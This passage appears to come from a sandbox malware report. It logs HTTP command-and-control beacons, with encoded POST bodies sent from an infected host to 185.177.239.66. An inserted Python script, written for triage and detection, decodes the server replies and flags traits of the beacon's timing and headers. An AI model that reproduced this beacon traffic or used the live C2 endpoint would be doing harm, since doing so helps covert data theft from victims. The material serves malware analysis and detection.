Data Ascii: YZFY[_W]^\PUPYZ\Z][YTRU^TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9*1_$<%&3*3=(*V*W0*W9<<X0,$Z:-.Y#,Z!3
Jan 8, 2025 18:09:11.337697983 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:11.470454931 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
33 | 192.168.2.4 | 50040 | 185.177.239.66 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:11.600148916 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:11.952824116 CET | 2596 | OUT | Data Raw: 59 5c 43 5a 5b 5c 57 5d 5e 5c 50 55 50 5d 5a 50 5a 5a 5b 5a 54 56 55 50 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: Y\CZ[\W]^\PUP]ZPZZ[ZTVUPTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9=)['T(^0%$])%'[(*Y?)>!'>1-$X%?//=.Y#,Z!7
Jan 8, 2025 18:09:12.299433947 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:12.432261944 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
34 | 192.168.2.4 | 50041 | 185.177.239.66 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:12.568342924 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2592
Expect: 100-continue
Jan 8, 2025 18:09:12.921427011 CET | 2592 | OUT | Data Raw: 59 58 43 5d 5b 54 57 5d 5e 5c 50 55 50 59 5a 51 5a 5c 5b 5a 54 56 55 51 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: YXC][TW]^\PUPYZQZ\[ZTVUQTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:==['+%% ***3[;>?$*-&R&>:T9?X0'9=.Y#,Z!
Jan 8, 2025 18:09:13.231827974 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:13.363259077 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
35 | 192.168.2.4 | 50042 | 185.177.239.66 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:13.105299950 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2192
Expect: 100-continue
Jan 8, 2025 18:09:13.452691078 CET | 2192 | OUT | Data Raw: 5c 5a 43 52 5b 55 57 51 5e 5c 50 55 50 5b 5a 5d 5a 5b 5b 54 54 51 55 5b 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: \ZCR[UWQ^\PUP[Z]Z[[TTQU[TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:*1&3T Z$$*9"'S*<4(>$=*U.<8[$,Z:.Y#,Z!/
Jan 8, 2025 18:09:13.768513918 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:13.918092012 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 39 38 0d 0a 0f 12 39 5e 32 06 03 59 20 3b 26 1f 39 2e 24 5a 30 06 22 07 3e 30 01 5d 3e 0d 2c 07 3f 2b 3c 1d 3c 2b 0f 14 33 3c 03 10 36 3f 2e 04 23 2a 2c 5f 02 12 26 41 2b 54 2b 0c 28 3f 0e 04 2a 09 07 12 34 32 36 5b 2b 0d 35 0a 22 3a 3c 5c 31 0a 22 1c 30 57 23 53 28 00 09 17 3b 2d 31 5b 22 03 21 50 0c 12 23 0a 22 16 1a 51 35 38 3d 5c 28 28 22 59 26 43 2a 52 32 2a 37 59 34 30 3b 56 30 20 28 53 25 28 09 0a 24 38 09 5b 25 17 2b 09 39 28 20 53 22 01 2d 53 0e 30 55 51 0d 0a 30 0d 0a 0d 0a
Data Ascii: 989^2Y ;&9.$Z0">0]>,?+<<+3<6?.#*,_&A+T+(?*426[+5":<\1"0W#S(;-1["!P#"Q58=\(("Y&C*R2*7Y40;V0 (S%($8[%+9( S"-S0UQ0


Session ID | Source IP | Source Port | Destination IP | Destination Port
36 | 192.168.2.4 | 50043 | 185.177.239.66 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:13.495764017 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:13.843781948 CET | 2596 | OUT | Data Raw: 5c 5e 43 52 5b 5e 57 5c 5e 5c 50 55 50 58 5a 5b 5a 5c 5b 5a 54 54 55 58 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: \^CR[^W\^\PUPXZ[Z\[ZTTUXTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9X>08'8>)Y3>4T=?;)-%3-.?$(.=.Y#,Z!#
Jan 8, 2025 18:09:14.168071032 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:14.298655033 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
37 | 192.168.2.4 | 50044 | 185.177.239.66 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:14.429406881 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:14.786175966 CET | 2596 | OUT | Data Raw: 59 5f 46 5e 5e 58 52 5f 5e 5c 50 55 50 50 5a 58 5a 5d 5b 5f 54 55 55 51 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: Y_F^^XR_^\PUPPZXZ][_TUUQTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9=1=Y'T<Z%&;(*13=4>U(>3=":?;%/,Z..Y#,Z!
Jan 8, 2025 18:09:15.123116970 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:15.254828930 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0
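The sessions above are the sample's HTTP beacon to 185.177.239.66: one POST of opaque bytes roughly every second, each answered with `100 Continue` and then a chunked `200 OK`. The 2596/2592-byte POSTs all receive the same 4-byte chunk (`=Z@V`), while the 2192-byte POST of session 35 receives a 152-byte chunk, and session 35 interleaves with the regular cadence (its body leaves at 18:09:13.452, after session 36's request line has already been sent). The Python below is an added triage example, not part of the Joe Sandbox report and not DCRat code: it decodes the chunked reply bodies copied from the `Data Raw` lines, measures beacon regularity from the POST timestamps of sessions 29 to 38 (truncated to microseconds so `datetime` can parse them), groups reply sizes by request length, and scores the request shape. The path-length thresholds, the browser User-Agent pattern and the indicator names are assumptions, not report fields.

```python
"""Triage of the HTTP beacon sessions above (added example; not report or DCRat code)."""
import re
import statistics
from datetime import datetime

# Transcribed from sessions 29-38 above: (session id, time on the POST line,
# request Content-Length, total bytes of the 200 OK reply, None where the reply
# is not shown in this excerpt). Nanosecond timestamps are truncated to microseconds.
SESSIONS = [
    (29, "2025-01-08 18:09:07.798317", 2596, 200),
    (30, "2025-01-08 18:09:08.772443", 2596, 200),
    (31, "2025-01-08 18:09:09.708439", 2596, 200),
    (32, "2025-01-08 18:09:10.635338", 2592, 200),
    (33, "2025-01-08 18:09:11.600148", 2596, 200),
    (34, "2025-01-08 18:09:12.568342", 2592, 200),
    (35, "2025-01-08 18:09:13.105299", 2192, 349),
    (36, "2025-01-08 18:09:13.495764", 2596, 200),
    (37, "2025-01-08 18:09:14.429406", 2596, 200),
    (38, "2025-01-08 18:09:15.399936", 2596, None),
]

# Reply bodies copied from the "Data Raw" lines of the 200 OK responses above: the
# 4-byte acknowledgement every 2596/2592-byte POST gets, and the reply to session 35.
ACK_REPLY_HEX = "34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a"
LONG_REPLY_HEX = (
    "39 38 0d 0a 0f 12 39 5e 32 06 03 59 20 3b 26 1f 39 2e 24 5a "
    "30 06 22 07 3e 30 01 5d 3e 0d 2c 07 3f 2b 3c 1d 3c 2b 0f 14 "
    "33 3c 03 10 36 3f 2e 04 23 2a 2c 5f 02 12 26 41 2b 54 2b 0c "
    "28 3f 0e 04 2a 09 07 12 34 32 36 5b 2b 0d 35 0a 22 3a 3c 5c "
    "31 0a 22 1c 30 57 23 53 28 00 09 17 3b 2d 31 5b 22 03 21 50 "
    "0c 12 23 0a 22 16 1a 51 35 38 3d 5c 28 28 22 59 26 43 2a 52 "
    "32 2a 37 59 34 30 3b 56 30 20 28 53 25 28 09 0a 24 38 09 5b "
    "25 17 2b 09 39 28 20 53 22 01 2d 53 0e 30 55 51 0d 0a 30 0d "
    "0a 0d 0a"
)

# Request line and headers shared by every POST above.
PATH = "/javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php"
HEADERS = {
    "Content-Type": "application/octet-stream",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53",
    "Host": "185.177.239.66",
    "Expect": "100-continue",
}

MIN_SEGMENTS = 8     # assumed thresholds for the path check, not report values
MIN_PATH_LEN = 150
BROWSER_UA = re.compile(r"Mozilla/5\.0 .*(Chrome|Firefox|Safari)/")


def decode_chunked(body: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body; raises if a chunk is truncated."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0].decode("ascii"), 16)  # ignore chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)
        chunk = body[pos:pos + size]
        if len(chunk) != size or body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("truncated or malformed chunk")
        out += chunk
        pos += size + 2


def beacon_intervals(sessions):
    """Seconds between consecutive POST request lines, in session order."""
    times = [datetime.strptime(s[1], "%Y-%m-%d %H:%M:%S.%f") for s in sessions]
    return [(b - a).total_seconds() for a, b in zip(times, times[1:])]


def regularity(intervals, tolerance=0.10):
    """Median interval and the share of intervals within +/- tolerance of it."""
    med = statistics.median(intervals)
    hits = sum(1 for d in intervals if abs(d - med) <= tolerance * med)
    return med, hits / len(intervals)


def reply_classes(sessions):
    """Map each request Content-Length to the sorted list of reply sizes it received."""
    classes = {}
    for _, _, req_len, resp_len in sessions:
        if resp_len is not None:
            classes.setdefault(req_len, set()).add(resp_len)
    return {k: sorted(v) for k, v in classes.items()}


def request_indicators(method, path, headers):
    """Static shape checks on one request; returns the names of the indicators that fired."""
    hits = []
    if method == "POST" and headers.get("Content-Type") == "application/octet-stream":
        hits.append("opaque-post")
    # Browsers do not send Expect: 100-continue; .NET's HttpWebRequest does by default,
    # so this header next to a browser User-Agent marks the UA as spoofed.
    if headers.get("Expect", "").lower() == "100-continue" and BROWSER_UA.search(headers.get("User-Agent", "")):
        hits.append("expect-100-with-browser-ua")
    segments = [s for s in path.split("/") if s]
    if path.endswith(".php") and len(segments) >= MIN_SEGMENTS and len(path) >= MIN_PATH_LEN:
        hits.append("long-php-path")
    return hits


if __name__ == "__main__":
    med, share = regularity(beacon_intervals(SESSIONS))
    print(f"median interval {med:.3f}s, {share:.0%} of intervals within 10% of it")
    print("reply sizes by request length:", reply_classes(SESSIONS))
    print("indicators:", request_indicators("POST", PATH, HEADERS))
    print("ack reply body:", decode_chunked(bytes.fromhex(ACK_REPLY_HEX)))
    print("session 35 reply body:", len(decode_chunked(bytes.fromhex(LONG_REPLY_HEX))), "bytes")
```

The interval check flags seven of nine gaps as lying within 10% of the 0.936 s median; the two outliers are the ones around session 35, whose different request size and longer reply suggest a different message type riding on the same poll loop. The `Expect: 100-continue` check is the cheapest of the three indicators to run at scale and is independent of the path, which a rebuilt sample can change.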


Session ID | Source IP | Source Port | Destination IP | Destination Port
38 | 192.168.2.4 | 50045 | 185.177.239.66 | 80

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:15.399936914 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:15.749696970 CET | 2596 | OUT | Data Raw: 59 5f 46 5a 5e 5d 57 5b 5e 5c 50 55 50 5a 5a 5b 5a 5e 5b 58 54 53 55 51 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: Y_FZ^]W[^\PUPZZ[Z^[XTSUQTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9>!$"0_068\)*.3>+*;T=.)'[694Z08_9.Y#,Z!+
Jan 8, 2025 18:09:16.094341993 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:16.226859093 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
39 | 192.168.2.4 | 50046 | 185.177.239.66 | 80

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:16.347830057 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:16.703178883 CET | 2596 | OUT | Data Raw: 59 59 46 5e 5b 55 57 51 5e 5c 50 55 50 50 5a 59 5a 5b 5b 5b 54 52 55 5c 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: YYF^[UWQ^\PUPPZYZ[[[TRU\TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:*=$20'&0=*2$>?= *X!&-%.<_'<?:.Y#,Z!
Jan 8, 2025 18:09:17.039618015 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:17.172380924 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
40 | 192.168.2.4 | 50047 | 185.177.239.66 | 80

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:17.304862976 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:17.656682968 CET | 2596 | OUT | Data Raw: 59 5f 46 5f 5e 59 52 58 5e 5c 50 55 50 50 5a 58 5a 5d 5b 54 54 52 55 5a 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: Y_F_^YRX^\PUPPZXZ][TTRUZTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9^*=X02#363*37(<?V>&Q'=*V.Y4Y3Y:.Y#,Z!
Jan 8, 2025 18:09:17.977551937 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:18.110521078 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
41 | 192.168.2.4 | 50048 | 185.177.239.66 | 80

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:18.273616076 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2596
Expect: 100-continue
Jan 8, 2025 18:09:18.625621080 CET | 2596 | OUT | Data Raw: 59 5f 43 59 5b 5a 57 5e 5e 5c 50 55 50 5b 5a 5e 5a 59 5b 59 54 51 55 51 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
Data Ascii: Y_CY[ZW^^\PUP[Z^ZY[YTQUQTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9>1$"('$]):5$,S)<?U>=%$=).Y'$<#--.Y#,Z!/
Jan 8, 2025 18:09:18.971453905 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 8, 2025 18:09:19.104218006 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 08 Jan 2025 17:09:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@V0


Session ID | Source IP | Source Port | Destination IP | Destination Port
42 | 192.168.2.4 | 50049 | 185.177.239.66 | 80

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 18:09:18.946580887 CET | 575 | OUT | POST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: 185.177.239.66
Content-Length: 2192
Expect: 100-continue
